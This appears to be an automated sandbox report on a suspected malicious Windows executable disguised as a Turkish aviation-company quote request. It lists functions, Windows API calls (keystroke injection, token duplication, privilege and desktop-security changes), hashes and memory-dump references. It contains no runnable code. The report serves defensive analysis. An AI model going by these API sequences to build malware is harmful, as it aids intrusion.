Instruction ID: 1155eae1480f7695a6d7f163cac05be5413104070b0d228dfad4f4471dfd8d7f
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: FDF0F43A510A10A6D7353A799C05B9A33DC9F73334F100B19F429931D2DB70D8068AA5

Function 001B4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00181129,00000000,?,001B2E29,00000001,00000364,?,?,?,001AF2DE,001B3863,00251444,?,0019FDF5,?), ref: 001B4CBE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee49c2215a7d596380eb65e061c537a811ebd4dbac9480f1bacede402bae9112
Instruction ID: 02034771ec996416f1cd5bb69a5eed4aad74c83dae5c3ddaca94f4d7c57b4bf5
Opcode Fuzzy Hash: ee49c2215a7d596380eb65e061c537a811ebd4dbac9480f1bacede402bae9112
Instruction Fuzzy Hash: 0AF0E93564222477DB215F669C09BEA3F88BF91FA1F15C125FC19E6183CB70DC0156E4

Function 001B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a392605c080d45aea25638d1b01dc474c9484f04b2974f72e5f4e4bb7e0b84d5
Instruction ID: 523d3d8a3572a0cadb4de91dd74fe692d3d6e7dc093df5315555d7f372f5dd8d
Opcode Fuzzy Hash: a392605c080d45aea25638d1b01dc474c9484f04b2974f72e5f4e4bb7e0b84d5
Instruction Fuzzy Hash: 70E0ED39140224ABE7212AAAAC04BDA3648AB927B0F160235FC24924D0DB60DE2182E2

Function 00184F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184F6D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fbb2c7ac481d5a677550c080c32746c98907a63b3d20f55a13f559a0d031ac07
Instruction ID: 2b9c7659d9eb4d7c9a1e73fd87cc4c19991f66393faff41e7093aa230fcf558b
Opcode Fuzzy Hash: fbb2c7ac481d5a677550c080c32746c98907a63b3d20f55a13f559a0d031ac07
Instruction Fuzzy Hash: 7EF03975145752CFDB38AF68E494822BBE4BF143293258A7EF2EA82621CB319944DF50

Function 00182DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00182DC4

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: e7c66a463ba96a0567aeb9fb0f89e697c6251c57f99ef26da90a0507f5b3730a
Instruction ID: 18bf87b719a264e2cd83b0ef2e1c82d8f97ba033358bd354f7cbe810b19f03ce
Opcode Fuzzy Hash: e7c66a463ba96a0567aeb9fb0f89e697c6251c57f99ef26da90a0507f5b3730a
Instruction Fuzzy Hash: B0E0CD766002245BC710A2589C09FDA77DDDFC8790F044075FD09D7248DA70ED848650

Function 001F2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 001F26B5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 1f2f720c9c037a077ecc3fff795144702d5a6c000578fa1cb798d21d7d53bc3d
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 9FE04FB0609B005FDF395A28A8517B677E89F4A310F00086EFA9BC3252E67268458A4D

Function 00182B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00183837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00183908

Part of subcall function 0018D730: GetInputState.USER32 ref: 0018D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00182B6B

Part of subcall function 001830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0018314E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 7c431a56631cefd49ab6352053e9043098584b2882748f128d4db71384ccabaf
Instruction ID: e921899a63f699b878df7fc69ab719637a6779b9d8da377bce066c0a11d18518
Opcode Fuzzy Hash: 7c431a56631cefd49ab6352053e9043098584b2882748f128d4db71384ccabaf
Instruction Fuzzy Hash: 04E0862130424406CA04BB74B8565BDB7599BF2756F44163EF552471A2CF344B594B52

Function 001C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,001C0704,?,?,00000000,?,001C0704,00000000,0000000C), ref: 001C03B7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e588dd59fad59fa8b316e7b193c7488d3e600735c551f04c31719e1be2de5c37
Instruction ID: 8091a098a3573b948bb7fcbf8bc1c02ec2a9e6e5adb57a018e16f479a9c1067f
Opcode Fuzzy Hash: e588dd59fad59fa8b316e7b193c7488d3e600735c551f04c31719e1be2de5c37
Instruction Fuzzy Hash: 0AD06C3208010DBBDF028F84ED0AEDA3BAAFB48714F118000BE1856020C732E821AB90

Function 00181CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00181CBC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: ef86fcaf090229cde430131220f0768e019b4680c29d57fa3065c8414fb4fd52
Instruction ID: 882427b2892d30f192b659df9d5d3021b20f3656351c31e3797660f4c76db6c3
Opcode Fuzzy Hash: ef86fcaf090229cde430131220f0768e019b4680c29d57fa3065c8414fb4fd52
Instruction Fuzzy Hash: 9BC0923A2C0304FFF2198B80BC5EF507765E358B02F948401F609B95F3D7B22820EA58

Function 018A0A78 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 018A0A89

Memory Dump Source

Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2d04515a863f774dae542dbcf69efa0dbe36c58982ec296ec03fd8e015fd8afc
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: DDE0E67494410DDFDB00DFB4D54969D7BB4EF04301F100261FD01D2280D7309E50DA62

Non-executed Functions

Function 00219576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0021961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0021965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0021969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002196C9
SendMessageW.USER32 ref: 002196F2
GetKeyState.USER32(00000011), ref: 0021978B
GetKeyState.USER32(00000009), ref: 00219798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002197AE
GetKeyState.USER32(00000010), ref: 002197B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002197E9
SendMessageW.USER32 ref: 00219810
SendMessageW.USER32(?,00001030,?,00217E95), ref: 00219918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0021992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00219941
SetCapture.USER32(?), ref: 0021994A
ClientToScreen.USER32(?,?), ref: 002199AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002199BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002199D6
ReleaseCapture.USER32 ref: 002199E1
GetCursorPos.USER32(?), ref: 00219A19
ScreenToClient.USER32(?,?), ref: 00219A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00219A80
SendMessageW.USER32 ref: 00219AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00219AEB
SendMessageW.USER32 ref: 00219B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00219B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00219B4A
GetCursorPos.USER32(?), ref: 00219B68
ScreenToClient.USER32(?,?), ref: 00219B75
GetParent.USER32(?), ref: 00219B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00219BFA
SendMessageW.USER32 ref: 00219C2B
ClientToScreen.USER32(?,?), ref: 00219C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00219CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00219CDE
SendMessageW.USER32 ref: 00219D01
ClientToScreen.USER32(?,?), ref: 00219D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00219D82

Part of subcall function 00199944: GetWindowLongW.USER32(?,000000EB), ref: 00199952

GetWindowLongW.USER32(?,000000F0), ref: 00219E05

Strings

F, xrefs: 00219D07
@GUI_DRAGID, xrefs: 0021997D
p#%, xrefs: 00219990

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#%
API String ID: 3429851547-2685227466
Opcode ID: 57c708d8bccdc76bba98d124f6c9097d2b45c6d63cc3ca7b2aa77cc1ceb1fe5e
Instruction ID: b33aa9234e2c146ce18c0f2dd27bdf5d4115b4cc3e5014897facfb7d2cd6f261
Opcode Fuzzy Hash: 57c708d8bccdc76bba98d124f6c9097d2b45c6d63cc3ca7b2aa77cc1ceb1fe5e
Instruction Fuzzy Hash: 4642AC74614241AFD724CF28DC58BEABBE9FFA9310F104629F599872A1D731E8A0CF51

Function 00214873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002148F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00214908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00214927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0021494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0021495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0021497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002149AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002149D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00214A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00214A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00214A7E
IsMenu.USER32(?), ref: 00214A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00214AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00214B20
GetWindowLongW.USER32(?,000000F0), ref: 00214B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00214BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00214C82
wsprintfW.USER32 ref: 00214CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00214CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00214CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00214D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00214D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00214D5A

Strings

%d/%02d/%02d, xrefs: 00214CA8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 9c5e3a9334f307c3c180e708e4eb2ea8b6a46dbcfa2c88ba136481727b018f96
Instruction ID: 75f8167378905b8ee438f48c97c4924b3dfa463c1c7ae6cd7955a7406df5e73c
Opcode Fuzzy Hash: 9c5e3a9334f307c3c180e708e4eb2ea8b6a46dbcfa2c88ba136481727b018f96
Instruction Fuzzy Hash: F7122171610245ABEB28AF24DC49FEE7BF8EFA5310F104129F519EB2E0DB749991CB50

Function 0019F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0019F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001DF474
IsIconic.USER32(00000000), ref: 001DF47D
ShowWindow.USER32(00000000,00000009), ref: 001DF48A
SetForegroundWindow.USER32(00000000), ref: 001DF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001DF4AA
GetCurrentThreadId.KERNEL32 ref: 001DF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001DF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 001DF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 001DF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 001DF4DE
SetForegroundWindow.USER32(00000000), ref: 001DF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF4F6
keybd_event.USER32(00000012,00000000), ref: 001DF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF50B
keybd_event.USER32(00000012,00000000), ref: 001DF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF519
keybd_event.USER32(00000012,00000000), ref: 001DF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 001DF528
keybd_event.USER32(00000012,00000000), ref: 001DF52D
SetForegroundWindow.USER32(00000000), ref: 001DF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 001DF557

Strings

Shell_TrayWnd, xrefs: 001DF46F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a648e58fe3f4797ca218a5d71fdcff33ec4ddd94614f717b7e7b20af96581667
Instruction ID: 42bd90ab60db82607659074614b9f4f4dbec35419bf73017048dff55867f4787
Opcode Fuzzy Hash: a648e58fe3f4797ca218a5d71fdcff33ec4ddd94614f717b7e7b20af96581667
Instruction Fuzzy Hash: C0316575A80318BBEB216BB56C4DFBF7E6DEB44B50F20402AF601F61D1CBB05D01AA60

Function 001E1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 001E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001E170D
Part of subcall function 001E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001E173A
Part of subcall function 001E16C3: GetLastError.KERNEL32 ref: 001E174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001E1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001E12A8
CloseHandle.KERNEL32(?), ref: 001E12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001E12D1
GetProcessWindowStation.USER32 ref: 001E12EA
SetProcessWindowStation.USER32(00000000), ref: 001E12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001E1310

Part of subcall function 001E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001E11FC), ref: 001E10D4
Part of subcall function 001E10BF: CloseHandle.KERNEL32(?,?,001E11FC), ref: 001E10E9

Strings

, xrefs: 001E125A
Z$, xrefs: 001E1392
default, xrefs: 001E130B
winsta0, xrefs: 001E12CC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z$
API String ID: 22674027-3486118733
Opcode ID: a65c03b884e72cef7e73f4f7fb7ceb43cdb3ed331067b2531058aa0108e4d6d1
Instruction ID: 5b41f36e6be59e8016134831177d55236d98c89434b065adaa18b1d181ede110
Opcode Fuzzy Hash: a65c03b884e72cef7e73f4f7fb7ceb43cdb3ed331067b2531058aa0108e4d6d1
Instruction Fuzzy Hash: 8B81AD71940689BFDF219FA5DC49FEE7BB9FF08704F248129F911A62A0CB708955CB60

Function 001E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001E1114
Part of subcall function 001E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1120
Part of subcall function 001E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E112F
Part of subcall function 001E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1136
Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001E114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001E0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001E0C00
GetLengthSid.ADVAPI32(?), ref: 001E0C17
GetAce.ADVAPI32(?,00000000,?), ref: 001E0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001E0C6D
GetLengthSid.ADVAPI32(?), ref: 001E0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 001E0C8C
HeapAlloc.KERNEL32(00000000), ref: 001E0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 001E0CB4
CopySid.ADVAPI32(00000000), ref: 001E0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001E0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001E0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001E0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0D45
HeapFree.KERNEL32(00000000), ref: 001E0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0D55
HeapFree.KERNEL32(00000000), ref: 001E0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0D65
HeapFree.KERNEL32(00000000), ref: 001E0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 001E0D78
HeapFree.KERNEL32(00000000), ref: 001E0D7F

Part of subcall function 001E1193: GetProcessHeap.KERNEL32(00000008,001E0BB1,?,00000000,?,001E0BB1,?), ref: 001E11A1
Part of subcall function 001E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001E0BB1,?), ref: 001E11A8
Part of subcall function 001E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001E0BB1,?), ref: 001E11B7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

